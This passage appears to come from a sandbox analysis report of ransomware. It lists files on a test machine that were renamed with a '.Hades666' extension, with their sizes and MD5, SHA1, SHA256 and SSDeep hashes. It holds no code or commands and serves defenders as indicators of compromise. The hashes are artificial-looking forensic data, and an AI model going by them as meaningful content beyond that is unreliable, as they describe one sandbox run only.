SHA256: 874cb4625b6db275b5b78932f47c0a9eec0cbf90798162bc78d9e7f6474524ef
SSDeep: 768:h7sTrDqfL38zQQ+KOSFTiaQKv5dONKlUx735CzJTeBQxxsX7jt:VsTrDK/TKOSFTtLkNK6aLxxg9
False
C:\Documents and Settings\FD1HVy\My Documents\mYd7cywDST.docx.Hades666 57.58 KB MD5: 1fecc9c11a7c78c593157f1967ff4cb4
SHA1: 2db44ea8c2c7f48d0167f48f8e426e568d68f047
SHA256: 1ffdb9f8a083c1fba8ed589acbaeec49cd6c2c1ae7ce7a36d93c98ec21f11696
SSDeep: 1536:JDcu23i8cZKsNFT7NcTKPQYkAaZHzycn9Yp+O3nIbUElqO9XCCZ:JDN23iBZKsPT7NJP3XaRyc47Ibm+SCZ
False
C:\Documents and Settings\FD1HVy\My Documents\o30CQCuB8bdhHb.ots.Hades666 50.50 KB MD5: 82b31444f967eb97c366bcaebc17a293
SHA1: 1f156201457a746fb576be8f25aa686e7cf5ccdc
SHA256: 38f2743ee3f9b464a114cbef78c22845c5490735157f62a935389d704ab43065
SSDeep: 1536:DHtFHYPQk7AFE/Io3E1lFt96P0+S7tFtf:PkQkkC/gGPkjtf
False
C:\Documents and Settings\FD1HVy\My Documents\oyjGs-vsR B9HxSBTe.xlsx.Hades666 58.52 KB MD5: 200f7afe44d461fe5fd04304f206ffce
SHA1: 0a138550e05f4d7d342b1d04d193be0e024fa7d9
SHA256: ab5f3885fddaf364c97312b95cbb81c68aeb122ee2018c2337c1232b68825061
SSDeep: 768:Toe2X48z4XWvJCEBrtaoC03ZJGrQNb9KzafBhaHBTs+2SlOhBesJ9dsZVQAWIiAL:ToeozTCErx3Z4k9YG9SK3iZoIiF7V0
False
C:\Documents and Settings\FD1HVy\My Documents\vJlQBx.xls.Hades666 47.59 KB MD5: a98e43f6c607458c42cbeae8f92f0614
SHA1: 86df3f7c5c9c962545a48eab7c5349d48312767d
SHA256: 9690fd59c0fea91321697f1c2361c383ba99fbf1ded03a13d245aa1b0d1b2cf4
SSDeep: 768:8ngv9f6FaHikmprN04OSSBE/cvMhU7m+iBEvEf+cM2M4Lbo9f+LtVsVO96L55cXS:8nCVmprN0cSBE/AgU3yE8f+ln4LcBo7Y
False
C:\Documents and Settings\FD1HVy\My Documents\vMA Qdvy.xlsx.Hades666 91.59 KB MD5: b0deb9d9ef64fefd62e92f5132519391
SHA1: cc32cd07c4e85e02d3803476e318e8e2e04c8e63
SHA256: dcd05a51ad5edd42b32b3ab9322e52ba52cd7c055b9516351be4015c98ab265a
SSDeep: 1536:KfLnoiknqnXTQYByaygCOnbcHOK4TqSvfjlNDWKuG7E1wsxJglSmfI1r31BEgB:TqnD1DoETqg7lNDpI1N8nYLn
False
C:\Documents and Settings\FD1HVy\My Documents\YCOQqj5kQ9XpLXm.xlsx.Hades666 33.17 KB MD5: bf80e740bcf8bd3542f1631626581afa
SHA1: 76e2302b4869b082891b144e71c91711ff0309d5
SHA256: 58d3309cc3a5b07f42b087f9660e68ca8965715fcca72b9d5d8537379e78ae1a
SSDeep: 768:OrwhwONHD9i007p53yr+hRyli+MRRZGpdn1b9pcSR:O0hbDQnn3y+h6VMalHLR
False
C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\kkcie@kdj.kd.pst.Hades666 265.75 KB MD5: 2243850ff815e7bd44b1976a71927464
SHA1: 15353ad0dee4c4af1db5b8fc6399641ab2e373c9
SHA256: edff8fcc0f47f58396a7e4d01c74f6d567fe88ce7a7d6e22dbd0e93d375118d1
SSDeep: 6144:+LrNdIS2FC1rY5boJSe4f9U++jc712POuC9bG77VDEivbtu2W:soS2SbJ69j1cOp9bG7eYB8
False
C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\folder.ico.Hades666 29.98 KB MD5: fdd1504a8709506d2cbb5899a38baa8e
SHA1: 75ecd76ca75e632f94cc09b8c7e8757c83172cb3
SHA256: c5377e007988abc8bd2ec2b0cc46ad3343eddfbbf46a0c74b8adba6763b0b691
SSDeep: 384:go1R2Kb1UKQId30JggiUFrleH47eyPReRAbPPY4x1xXJUN2A6f/CwBjnAx0KBEMX:R1R2Kb1z3MLmceysqbHY4jAkB8E1+T
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\xIKve1epy5TaSZNBJO.m4a.Hades666 48.83 KB MD5: df9695439e6592ab486e9f4952ebdf0d
SHA1: 47930804c3673f4f8a6d5f19eb874886d4add393
SHA256: d39bb1cdb7bb30e9e05988f599fc86ad1997e8d46940fc626db2d287e33a358e
SSDeep: 1536:czXKuzvfLB1jye5J6kgn67NnBS6dBQLs5jlSm05w:q6uzvDBN/vgn6xnBSpc3
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\BAaa3e1h2lTJYNIOURr.wav.Hades666 50.83 KB MD5: 1bcefa8295c03bfd19fc2105d8390a5d
SHA1: 8ef22d6e81d3e63383e636d3351b77296c16d6b8
SHA256: c6be156f648053d272a2a8d04389758140eb4e8f64c1f07540c6377e6f8bed73
SSDeep: 768:3iN1VEnqi+hmH/UiKVWyLvCi1k7iN17ZgwUisGJ94516+S13ck4h8ElYG:3ivmnqBhmH/ZKIA3iONg8LJi51Oy80
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\m3q-E9nfMbEgYl1Pe.m4a.Hades666 63.23 KB MD5: 8c7d8c429b47f010c7aedf6f67a66e00
SHA1: d2cb3269ba24db5671cbed90c0a2452d232fdca2
SHA256: e7c8e69fa2329832dbc78d5740d15651248e917047407d28cf6671c77c46c46e
SSDeep: 1536:+dL608RzUCb2JEZgF3XkcgHMM7Q9KynMVQIgm8+Ta45qkOruLkBuCDS8j1Bg:+xp8RV2xF5gHMiQmVimS41OrPxFj1S
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Te_ga.wav.Hades666 88.20 KB MD5: b59ccf461b1050091c888708b5f0464e
SHA1: 3d25199aa7644aaf43585ba5b378b113ca871528
SHA256: 34a4ceedf9411d7c2c2fed22b2c44bd90ae049cfa2525c7e93d5180ce1870fa5
SSDeep: 1536:5avx7JFoWLHXba6GtrEt7adDTdoooDAf6LQbtAUCD/q/LLQVcQsoXGyKlwM:MJFbTra6hdadDJ8Aycx0mPYcQhQz
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\_zhgc_Z.wav.Hades666 4.16 KB MD5: b157ed600efae573b1388318823e25fe
SHA1: 698ad39ceb3043457d9f3af53af4f9bdd4d748b4
SHA256: 3ee7c2f4940acfd5bd52480ff45b445ecbdd9f112037dcb405a4e0c31354a975
SSDeep: 96:eUXpr5W6Dgbvph6EzlZCK1T5sLD/YFYjSAGpIVTCAHyUNPOZ6Y:nFfULLHhTI08Ii5HYt
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\DxCsbzDxs.mp3.Hades666 39.58 KB MD5: b08103dd5b477b12353f40e707c3db2b
SHA1: 43c367a62f5b133e9cb04d7abe420a8f75314af2
SHA256: 79f4e56babe67bdd0533b1e2eb0ad28fcc4ff64e7fee8268b585e38ac86a7879
SSDeep: 768:ZdGdodnRqlBM1sQc2lxT95Fo/sbQy7kAsBd7H1w9uzO816R5QY60M+H57cY4t5g+:ZMGRYWsdmDfbQGsBd7Hal/3b4t5H
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\y-gmiZ3EVZAMHBqa.m4a.Hades666 16.64 KB MD5: 39020a2b106b8b336341228ac4adcf31
SHA1: 8348464ac0962235b62f6eb36358434a2518c011
SHA256: 5a930a7ce89a328ea52e53b735254e0bee3eb34156711635f91d9699957c6725
SSDeep: 384:Rcn3pKus8S2SUrQLIzJW4FVrxgU8zr4SqPWcWfA:Rc5c8Jz2U84SqsA
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\8a15c9EmXZUQkn3yZLSu.mp3.Hades666 52.02 KB MD5: 49ee665afd6e9cf386559d4dafa27980
SHA1: c08579de8a9d8bc90d3db4bf9a0b6cba11819262
SHA256: 761ee759e66a44c461421110505d1f6c9fcbb2ac569d2a60f5c7089fb6236c09
SSDeep: 1536:MznH+MWFOkBWUfgOpQEYZTBg86u6+1HRg:M7R30WudpQEYZTBg86x8C
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\jIzljgerjD3abNZk.m4a.Hades666 3.62 KB MD5: bef6dfc79a002b28a396325e8cfd0d09
SHA1: 85b06d16580e36fbdf7d593f395b704d4c601e29
SHA256: 9271d8911857d02693bf575335f38fa08bd60cc9b09d3085b6ce57c80a27d793
SSDeep: 48:FPOlhv30ekBFhW5t/UIh541AOl3A3yCyjLeX7PGvaoudvLzKfLJXLY3aFZmWayOT:qhP4B38R90iO/FjC6YzKNXLs8ZuyOZ6Y
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\rHULW.wav.Hades666 97.08 KB MD5: dd45241b4cb01182ecfd436b59195721
SHA1: 6e1bae250b43836c3a1a7c1145eec1b3d26d83d1
SHA256: b0f770edf0f31936b666096ec15f52c3625f6421c1909fb5387ea1618f7fe8e5
SSDeep: 3072:LEj5nDuJHr+JbhNG/S1hCzYq1c4gWJMxSygK:0uJHaTE/S1hNqOH
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\9iPxYg1O.mp3.Hades666 17.22 KB MD5: 2698e38aa19a007e33f44365b898df67
SHA1: f04ee22a87c23ee80e52a8aaa0af06f1c286347c
SHA256: 932e1d66ef605e836a82cfc9d6ff892f5b0657c05087de259cde030a38cc6918
SSDeep: 384:Of2qIZP6Q7sjY/75mfIuafULR0p0TsyhAyHIaIEtr5:OfXIxlFmoAR0p0TsdfaIs
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\zin-T7pL1d07aj.m4a.Hades666 48.55 KB MD5: f1fd6242028ea7593c63c8c5b6bb4167
SHA1: 6844c0d4a5a2346fbd158f00abec72e25a57620b
SHA256: 094d6f0d1866e89860ee9bc329990897edff2377bbb351a2404c790e8c452f66
SSDeep: 1536:Nc8KKGMmHlq+ID2FEWXnz1gnwcNxdhSw4:NcRKGHqDD22CIw6xDSw4
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\XBdTL-CUh-k.wav.Hades666 76.56 KB MD5: d440c1ca235e48000bb7e2b2f0641adb
SHA1: c4890e1e0e0ea34184f094e3adb39145748b349e
SHA256: 385e834f8523bd4ee57235d9dc8bb47edb7ac234c60b0b07e459382cd315721e
SSDeep: 1536:6rYLjYJPfjUMIP/6K2YTE8fgpYmxcezphl/kcjf6GEvWXng7+L1Kb7DX6q3Gm:68Lj+3QMIPSK2Yw80weJ56n6ZxKb7DXh
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\QNvdrxGyuyXkTr.m4a.Hades666 84.38 KB MD5: e3a100c4e00c503c23ae895d21199cc7
SHA1: 39c767f382ddd73a0da8d56d76b47227c5a24825
SHA256: 6d782b3f64ce51a952e6d861d2de00f0cfa981f2a0ed41418bcf034cc36eabac
SSDeep: 1536:ccjBXP58xnopwzJ4HYBU5CV6tvsHq30JuagOUJcQxAxbOfQn5uOa03M/Ttc1MP:FP5Ono6yHMU5j0KEuDJcQixb425uZFBd
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\r3evlg.mp3.Hades666 54.14 KB MD5: 454d29bb3989d71ea88594d41deddc3a
SHA1: a746dabf148b3b3042d2f2107f914e2943658451
SHA256: 2e6d22a180d38249e5448f9b0f650691ada58e8c3abab33a8f66a678bb80cefe
SSDeep: 1536:bWDcGnGVFdfttO82LFTkuW8QbyykGedM94/:6D9GHdfHORhTibyZX64/
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\uTrfomCxIjimUGwk.wav.Hades666 54.92 KB MD5: 5ebe28546c46dfa692ae21913744a19e
SHA1: 2f142608ad24a60c1b1518835b13dbd28b08fef7
SHA256: f208a462998a1b7ca280d9056ccdb6f616cfd0ed3af814d88da29641f3d810c9
SSDeep: 1536:fkb1Dpr3Hk7JqxrwN+Ha+vlJ4Y4RC6iXH9u36w9HnIm99d:CrTk7JEwNl+LR4I6iXH9u6w9V99d
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\YUIsYjlW9J5Ehao1EkEz.mp3.Hades666 3.91 KB MD5: af867acdbfb666bed8f318215ced2def
SHA1: 2a2032709478884980fad17410463a3595c0fe71
SHA256: 8079981b0e9aa465104f4b599295f999b69cbcdf298a48661ff541fa01b52fd2
SSDeep: 96:gDQsjXKKeiORPgBbHPN1WtOmM9GcQB1WkfZOZ6Y:gVXKfiOsbvNcm9GTQkfit
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\5FKUdmKmT3tyICvOkik4.wav.Hades666 76.22 KB MD5: 7edca506a3f4e02713e3907c6858da3f
SHA1: 072136376c38ab80eafef50b718b3a8ea78386cc
SHA256: a21381104c23f7c365992fd3b1c0c0379ce7f8e154cd2dbdac3853799a5085e3
SSDeep: 1536:Of6MDd4W7NTf/OmMWEAYOTd3b0ZWUMB7B:Of6AdD7pmmMWvYSQZW77B
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\vK1-.wav.Hades666 18.62 KB MD5: 39009c9c1ba7c76d42782bb8b7983473
SHA1: e6e3a8a09af639be23d16a400eed6e79116be419
SHA256: feded74f185cf9b407c01d59ee55575b8eab404934a1494db0d687cef7b2edd0
SSDeep: 384:nmK+FdRq4B16Po7Fl5329ON3wl7so4G5v142M8DNlJPO9O8ci8:mdFdRqa160NDwlj5v1tlJPsOh1
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\1uqkkl.m4a.Hades666 11.94 KB MD5: d1bfc41104241e1406b63fa2bfe051d1
SHA1: 9f68e246a4d7e7a1af47022b6d43ccebe240ab37
SHA256: 8c23b3d148046a5dfc9ac2bdda264718edec9e813ad587530a477e86dd1c57a1
SSDeep: 192:P4ICH2YhhMLC/H8idOhKPTekqfmUu+shO8wSmELlLEbLgtwd9ysSenm4sRw7Siu9:xCWYh/cyKdNv0nsEB44twd9fFnmfw7k9
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\eevQcTFNQMa.m4a.Hades666 39.89 KB MD5: d210e02c1ee97975b3624144598e2ec6
SHA1: 1593a170496d5bf784a25b7c67c3c88e04d51310
SHA256: 9ef863ec91298fa109ae477b59b63c3940b14ef9531be0bfc92ac35aa5b020ea
SSDeep: 768:QEHqiPquesudAm/Hq8xpb+H2j49VxvDUaZyN22bQzqmhF7BFsXSGltT:BquesudAcxpSW89DLfo220FVFsjltT
False
C:\Users\FD1HVy\Desktop\ids.txt 1.04 KB MD5: f894400d7b2bacc4ef0db330d8232e99
SHA1: f3e458f9e1895a6b3a41c968747c786d6b239605
SHA256: e23064f688721c6ff29708883e3df5a730baa54a5e8707168850ad04f9d8440a
SSDeep: 24:woLlNYXg00ZB1qRf5FWhK49WKdHbDe+SCPA0BHuZ6yyotf6yIFHnAvvn:wwCY1qRf5GJWAHPSM9RUloyAnAvv
False
C:\Users\FD1HVy\Desktop\ids.txt 1.08 KB MD5: b1b12bdf37f67ad9a8f20e35b9a89521
SHA1: ad5680a726ec6b8cb51c7ceefdcca7aede7bfe70
SHA256: 94f935b4bb81f23b45c57056121942bafa94543ef91060b131a8896e17b96b00
SSDeep: 24:woLlNYXg00ZB1qRf5FWhK49WKdHbDe+SCPA0BHuZ6yyotf6yIFHnAvvJs:wwCY1qRf5GJWAHPSM9RUloyAnAvxs
False
C:\Windows10Upgrade\upgrader_default.log 245.08 KB MD5: f8112b6d8be1dbc3134d1181210dcba0
SHA1: a6bb3eb013e2c409df516bc58121509750be6e5c
SHA256: a03748a42082051b2b0adfcda1a2c738bf389be50c9d2b836da626b9ae0d1ddf
SSDeep: 6144:wmPPw+3KN+46ThpRNGjAsWwcToFDn38UkMIWuq8udykOcTeLXN3Xi:wm1d4SYjrAToFL8U5IWZby1cTeLXNC
False
C:\Windows10Upgrade\upgrader_win10.log 20.83 KB MD5: 01d58b7b8403961d018850a6192f1b2d
SHA1: 444c0c29d5ec0073800b19f13b1e7595242cb4a3
SHA256: 447a4ca23bd823335de5719666b2c5153c38bfb91f4d5681724c811ae71794ed
SSDeep: 384:NAdLuFXvdPs/yJo7dr8iTDKI0kYzFErrhHQvNy6S0Ner8YOQnmHfvCE5AClFRFDV:0svBQrXGrbxq+vqr7K/vCEljFi4
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 1cd353bd97a5588e0538494e81311634
SHA1: 2551e99b9d2277e1d337034d16129b19a046fddb
SHA256: 2aeab29e353e2a2836a76722bd405f688d4440b97f05e90da4e69f09eacbf57e
SSDeep: 24:qT0kgTMN9ELjajpZO+Xnv0ZVuqIGh0za2HZJu:dkgTiSLiOgcZVuqIT97u
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: bbdc1e03e0b6dc99edb62219c4e37884
SHA1: eab022598d42a620123b0014e783c4986e9ab391
SHA256: c5b20d51b96a4beed9575e63836748cbe0a22b6eca4d1963c701fcc8562ddc7c
SSDeep: 96:nyjUuT1NNbDN8zzZ76EDxY2DWcrb2OzmH2ZTnOZ6Y:Py/NizZ7bDxpTriOw2Zkt
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: 55c31491d56456b11132acc2cc9350fc
SHA1: 8e75e84095c4a0510521cf41467e2a0a0ae6bffb
SHA256: 7226d2c6985bf1a6bb2ba09bd50cb15a8ef70b95e2ecd12738b34dba24854863
SSDeep: 96:KjtmdDVnvafyIXt9bS1iHSEqZyN5NW68MIPmKOOZ6Y:KMRO19lQ+S/Zkvk9mK5t
False
C:\Documents and Settings\Public\Libraries\RecordedTV.library-ms.Hades666 1.69 KB MD5: bc04a6ef9004f801b73e7db01c1eedad
SHA1: 3bc04cc8274adb3ec4d41aa50b2d4d74e3b70b7e
SHA256: e0f374e553068893366fc853e8e765cc504aa67af3bb9cd56151fbcd5cd65bcf
SSDeep: 48:/lx8OiRYI9/Zvhjfh9dcFpXhx76aOgcZVuqIT97u:9ijVZvbLcPxh6aOZ6Y
False
C:\Users\FD1HVy\Desktop\ids.txt 1.16 KB MD5: 75f6980129e98edbf218003ddc706bc3
SHA1: c9d22dbfeb58c21d2508f8d8f420436d82e1961d
SHA256: 2a30c52aab90c49d187409265978b45d0863cc034b7477332d87e46b1617f3e4
SSDeep: 24:woLlNYXg00ZB1qRf5FWhK49WKdHbDe+SCPA0BHuZ6yyotf6yIFHnAvvJp:wwCY1qRf5GJWAHPSM9RUloyAnAvxp
False
C:\Users\FD1HVy\Desktop\ids.txt 1.23 KB MD5: e90e18a4f74cb618ea16246e0a24970b
SHA1: 4d55a9db1d5a4f1dc0aebb5361ec417d896c0200
SHA256: fe5f871d068e8a0db0f3c49701eb0150d0f6b5b00107ec60b1eca99650cf62b7
SSDeep: 24:woLlNYXg00ZB1qRf5FWhK49WKdHbDe+SCPA0BHuZ6yyotf6yIFHnAvvJH:wwCY1qRf5GJWAHPSM9RUloyAnAvxH
False
C:\Documents and Settings\FD1HVy\Videos\9ons\Jua Yx5oT-TmG.flv.Hades666 38.83 KB MD5: 753fa8db25f275f4afdaba31908137d8
SHA1: 07285291c3c7db9f55389a82436ef67fc9c754ee
SHA256: c5d6b682f38f9d0977e1aef1a2bbd9f783d76203c0ab8889faa9129a78047811
SSDeep: 768:caEZCQiFOdxvY5/WJgdu3/FVOvtAIcIg86dK4UzY05x1UM/GB:/EiFO3vYRWl3/FbIfG705xeDB
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\6hXid1btCJcj.mp4.Hades666 45.28 KB MD5: 971adabc425f894002ca84827f1c4908
SHA1: e56a9583d8670ae57b9900f8334c023808391e0a
SHA256: ea5ec8b3abd67462783178188b73d98dc6c210f20209cc6996cbe6f59ed17106
SSDeep: 768:7HFRlnS1D42UGvkzB3rMaSbuHios33M2omYR+KB4T9weBQiF/VxUp6H1JJ05:1S1ieiBbMaSbtP3M2or+KyZ1BQOPx1Ji
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\waEwyjT9rU.avi.Hades666 82.22 KB MD5: db1a080086d909fa7e7d9691998ef3b4
SHA1: 0b8089a9dd038b9fa2846a8c859a03213fc2f5a2
SHA256: c80b42ea66cc61ea33a49b52723565ff8d64429e58644eff52206ac8f2de1f6b
SSDeep: 1536:boo92ZoYN8nca1Of6WNsPRUW4PrKs6aXyAnGrrETC8ykXqLYyW13vJe9BI:kiQ8nB1eNsWW4PrKBaCVrAmpkRxfJefI
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\ITXjK9.swf.Hades666 77.00 KB MD5: b7932d7709f83a01bf9cb568191c4c0d
SHA1: 55cd344934a1892ed75ad47bcb11cbab08f3e64a
SHA256: 62864654471a4f6ca1b927f955585f315913a19569efde53d105d0caeef2d042
SSDeep: 1536:miVC6mDm0AWTYgALK8bwUO1zKv5lvO9op6PtFEN14VGd0xi6a5vsOafd4F387:6PgWhmK8bwZ1zKv5lvPpZNmGd0862Rfk
False
C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\6 iJ LK5SpJWis.mkv.Hades666 71.59 KB MD5: bfdd31b1e7cb688ec9b455a3b200235d
SHA1: 49902fb55f7d700de95b7fbda698b0346d14ce73
SHA256: 0e833e7c47f3682e07623622548e241ee7fc9a0f7c6242fdc8ef9cc993d69d86
SSDeep: 1536:pOcqErU/ihErYCNWv4yJFfT258LqDXT8yrMJ5qnYSFDYDb4n:FPEiKMJN8MqjT8J5qbKEn
False
C:\Documents and Settings\FD1HVy\SendTo\Mail Recipient.MAPIMail.Hades666 784 bytes MD5: c5aa1a9f6c56e8e512a79a4a01bc459e
SHA1: 220680c8d11c25f63212743dee85844a65c2a922
SHA256: 33249de0e230158907330335f78b9d441cddfd1a0d21048b8d3e486f17b812e2
SSDeep: 24:3LRsHMGF6IEl877O+Xnv0ZVuqIGh0za2HZJu:7aMs7E+7OgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1044f75bed7c89a3.automaticDestinations-ms.Hades666 2.25 KB MD5: 6a921e4c86f1a5417252eb3b60fe175b
SHA1: ab51e3ba66113e0b56ad23e008b000809c164db3
SHA256: 241366bc014ce0ff1b752eab708cf9e7fea7b6d7cd6808df88fb23ed730f28e9
SSDeep: 48:2E782C1NRZwA+lSXClVIbV6sKpMoPRkOgcZVuqIT97u:2c820N0JSdbV6sKOoPRkOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms.Hades666 3.75 KB MD5: 3bb6834a07cfaf0e4ec759c255077dc7
SHA1: cc4d5ceaedceed4c28b6a288da54b04a3a9ff65c
SHA256: 5e0fd8313a958fd3b38cfe246cbebad591252d454072d7be6e89474fe7705f79
SSDeep: 96:7u+bzky46f9d57+sFgFPTZmnykD+B4YJ6WloJpo8b1OZ6Y:7ZbFZf/5ZiZmnFayYJDE8t
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms.Hades666 3.25 KB MD5: fac829036b22f966e5c0e4e8206897c4
SHA1: 7f39c6a0c22a909defb14a24b786d0f4538bfbcc
SHA256: 94b2818221d45af65fc7b6e1202b5a21b18b7cfb790e8da8a4c99d0c0a971b58
SSDeep: 96:/JJNs8nG2Jq6E+YflfFLzm7lr6muOdquG1vUTXOZ6Y:dP9E+YflNaQOkzogt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms.Hades666 4.25 KB MD5: 2f3089c4e6b9b362d6dee917c5009b8e
SHA1: 5f90395ef142d9f1c1f7b361f1ea55fe4b71e984
SHA256: 37258827b7ce20500795138cea9b1d76c00f45d9aa7a1e3d5b588444d53d469e
SSDeep: 96:Q+i02VmaEzqqn2yHcg7Wp89UVw40VXopaI7NOZ6Y:Fi1nEmqn1HcgqzVw40VXoj7Gt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms.Hades666 3.25 KB MD5: 841629b87bfff1a5e4ffc822682e8d63
SHA1: 1953c70ca75c759611cc396507b91460463a2215
SHA256: 06a690a4c98585edbd6082146422bae74df90c2252054f2ad9640e2049054ad3
SSDeep: 96:e8n2VuIdyKS9VY6HrK5sq4d4ObWCXD/RjkTkyOZ6Y:eFVuIm1LKCqzOqc5jkoNt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6824f4a902c78fbd.automaticDestinations-ms.Hades666 3.25 KB MD5: 3727c61f8246f979921a3486d0e77375
SHA1: caa8b036b97c99dc9fe565b83eaf0ca57d197dfd
SHA256: e86d50724e0a2098805d0e6671b7b2d79a9619730622d3be8cb5cecc9b8b29d1
SSDeep: 48:dACS/B6Sw7r3mb9N/AYMc5n9SwVV80KNoWiIxzikC+hw3WngGElr87JwmH7gOgcj:d9S/Ezy9Bp9RV80xCnoGnSw7Jw1OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms.Hades666 3.25 KB MD5: d689b148e4c015880d9d86875e54ae27
SHA1: 558b6e1217624caeb1673eedc53d76070a1b0ff3
SHA256: 3e7aed508120e6f05f6cd82daf6eec7c97a31192b6a4cc05b736a466d2d2f7ad
SSDeep: 48:XUFdI8CqnB68FZ1a3FMJ4Ap/iM/82PxwPF+SPJGUhQonmSIlXcWHVOgcZVuqIT9a:6Iod8uJppnLPxwPISPVQo9Ih1OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms.Hades666 8.75 KB MD5: 3a373265b0be39bd0d04729642db17ca
SHA1: ca08525559fb38a40f6dc762ccd21cf1a74595d6
SHA256: 7db3d418e03f3ef9ae9930fd31470ea08d0f19e97d23932bafb7a9bffe9ec627
SSDeep: 192:G/4F9QKd1mLxBcUqMoQRhJwcj9EmjWd5/qcvyGfkR9tpkt:pFeo1mtBcUqMnw09EmjmqkyGfkR9G
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\80d13f95c2c02af9.automaticDestinations-ms.Hades666 3.25 KB MD5: c187048c7385d4b9d8b6e0edd8861f97
SHA1: 7d49e1f171056ba375d19e1b1a79512ef210c207
SHA256: 7db6aff2346c55d1f8e5817885d27e57cc30c2e041d0e788cde24d749321b066
SSDeep: 48:hjEEQdXHni26lf9/y8fIgbEppM9ijETjhG+PnrSuB/fiHP53DwUGqaITOgcZVuqP:NEJdXHiZhtf8pVgToSFihcU1a8OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms.Hades666 3.25 KB MD5: 2b0a4b01746046c853baba070c145fdc
SHA1: dbccfdec2d9837835784fdb299c46022821dc011
SHA256: d0b395169a91779e889dc23700d7b44b615cd8f09f9b589494d07a720bc7aa49
SSDeep: 96:ifpiEzg2/JnrII9/rNbnfOyYEDc38bI+Mn9NgOZ6Y:ifpJzzBEI9/rtfdc8In9NTt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms.Hades666 3.25 KB MD5: a2b36581b505c3381b8584d836d1149e
SHA1: aeb7d30f4e7637e47dacd5fa05bb4998b1ee8e91
SHA256: 6050a85756e9c0eccba6f05f0a639214bdb00dc43e6c0ca2595623e85f0aa15a
SSDeep: 96:ym00EwGvPhJ+mv2kOONb2gCHlnT1mKTw/chYYiMdNOZ6Y:ymQXvzv2k6gCHlnTfT1YYBdGt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms.Hades666 3.25 KB MD5: 481965df2b3a1f5b4e038ba0871647ba
SHA1: 96862d62c3e56575f1b0f373daaadb8059e15067
SHA256: e40dd7d80feb545b028fc436486751cbf69aa3da1966dba455d7f4b14f808c25
SSDeep: 96:N8v8EjhMbkwaS+adlMteEFo4BvafHFOZ6Y:N8vKbkwRMYEZBva+t
False
C:\Documents and Settings\FD1HVy\Pictures\1Rut_CZp95E3.png.Hades666 78.25 KB MD5: 913a2e703eec63bd6bb8a8c1c64dac43
SHA1: 26864810bd1e0faf1ca0fd5ca9278423d1e30378
SHA256: 2388f09c47fa9491b8f9c19f85b03bcbcf6299449c824b55eb53bf9d01fffc38
SSDeep: 1536:9xlU+pV/KWlIGb3jBkCwBMmQE3xaV1UU4YS6P4cAEp2thbH/c+Am:BUYtHRmRK1E3S1UU4ZYp27bEbm
False
C:\Documents and Settings\FD1HVy\Pictures\2dOcoM_aN0.png.Hades666 59.75 KB MD5: 065cdbf2b84c3211ac551e62c8837bec
SHA1: 4d95fb8223ec0fc35e9068c231bd7ca4491f5137
SHA256: 0c963995c7343fadda313978a24f0a24a8b33402cd0b6a1595f13bfa956c36ea
